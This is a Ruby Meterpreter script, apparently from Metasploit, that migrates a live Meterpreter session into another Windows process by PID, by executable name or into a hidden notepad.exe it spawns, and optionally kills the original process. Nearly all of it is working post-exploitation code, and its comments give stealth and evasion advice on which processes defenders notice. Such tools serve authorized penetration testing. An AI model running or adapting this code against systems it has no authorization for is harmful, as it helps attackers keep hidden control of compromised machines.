##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##



#
# Simple example script that migrates the Meterpreter session into another
# process, chosen by PID (-p), by executable name (-n), or freshly spawned (-f).
# This is meant as an illustration.
#


spawn = false
kill = false
target_pid = nil
target_name = nil

# Switches understood by the script; the first element of each entry says
# whether the switch takes a value.
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process"],
  "-p" => [ true , "PID to migrate to."],
  "-k" => [ false, "Kill original process."],
  "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
)

# Fill in the switches. -h, or any switch the parser does not know, prints the
# usage text and ends the script.
opts.parse(args) do |opt, _idx, val|
  case opt
  when "-f" then spawn = true
  when "-k" then kill = true
  when "-p" then target_pid = val.to_i   # non-numeric input silently becomes 0
  when "-n" then target_name = val.to_s
  else
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
end

# Spawn a hidden notepad.exe (resolved via the target's system path) and return
# its PID so it can be used as a migration target. It is started by the current
# server process, so presumably runs under that process's token — confirm
# before relying on it. NOTE(review): a windowless notepad.exe is a well-known
# indicator for defenders; prefer -p/-n against an existing process when
# stealth matters.
def create_temp_proc
  spawned = client.sys.process.execute("notepad.exe", nil, { 'Hidden' => true })
  spawned.pid
end

# Without any arguments there is nothing to do: show the usage and stop.
if args.empty?
  print_line(opts.usage)
  raise Rex::Script::Completed
end

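### Main ###

if client.platform == 'windows'
  server = client.sys.process.open
  original_pid = server.pid
  print_status("Current server process: #{server.name} (#{server.pid})")

  # -f takes precedence: the freshly spawned notepad.exe becomes the target
  # even when -p or -n were also supplied.
  if spawn
    print_status("Spawning notepad.exe process to migrate to")
    target_pid = create_temp_proc
  end

  # -n resolves to the FIRST process with that image name. For names that
  # occur many times (svchost.exe, chrome.exe, ...) that choice is arbitrary,
  # so use -p when the exact target matters.
  if target_name && !target_pid
    target_pid = client.sys.process[target_name]
    unless target_pid
      print_status("Could not identify the process ID for #{target_name}")
      raise Rex::Script::Completed
    end
  end

  # No usable target: e.g. only -k was given, or -p was not numeric
  # (String#to_i turns "abc" into 0). Bail out instead of calling migrate(nil).
  if target_pid.nil? || target_pid <= 0
    print_error("No valid target PID given; use -p, -n or -f")
    raise Rex::Script::Completed
  end

  if target_pid == original_pid
    print_error("Target PID #{target_pid} is the current server process; nothing to do")
    raise Rex::Script::Completed
  end

  migrated = false
  begin
    print_good("Migrating to #{target_pid}")
    client.core.migrate(target_pid)
    migrated = true
    print_good("Successfully migrated to process #{target_pid}")
  rescue ::Exception => e
    # Deliberately broad: the client's timeout/transport errors reportedly do
    # not all derive from StandardError — confirm before narrowing this rescue.
    print_error("Could not migrate in to process.")
    print_error(e)
  end

  # Only kill the original process once we are no longer running inside it.
  # After a failed migration original_pid is still THIS session's host, and
  # killing it would tear the session down.
  if kill
    if migrated
      print_status("Killing original process with PID #{original_pid}")
      client.sys.process.kill(original_pid)
      print_good("Successfully killed process with PID #{original_pid}")
    else
      print_error("Not killing PID #{original_pid}: migration failed and it still hosts this session")
    end
  end
else
  # Spawning notepad.exe and the process handling below are Windows-specific.
  print_error("This script only supports Windows targets (platform: #{client.platform})")
end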